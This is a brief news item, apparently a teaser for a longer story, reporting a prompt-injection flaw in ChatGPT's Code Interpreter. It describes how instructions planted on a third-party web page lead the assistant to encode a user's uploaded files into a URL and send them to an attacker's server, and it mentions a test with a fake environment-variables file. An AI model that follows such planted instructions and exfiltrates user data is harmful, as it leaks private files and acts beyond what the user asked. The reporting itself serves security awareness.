Thanks to new ChatGPT updates like the Code Interpreter, OpenAI’s popular generative artificial intelligence is rife with more security concerns. According to research from security expert Johann Rehberger (and follow-up work from Tom’s Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature. OpenAI’s recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks. A known vulnerability in ChatGPT for some time now, the attack involves tricking ChatGPT into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send this data to a malicious website. While the likelihood of such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. This security threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt — or through social engineering tactics. Tom’s Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment variables file and using ChatGPT to process and inadvertently send this data to an external server.
Full story : ChatGPT Has A Scary Security Risk After New Update. Is Your Data In Trouble?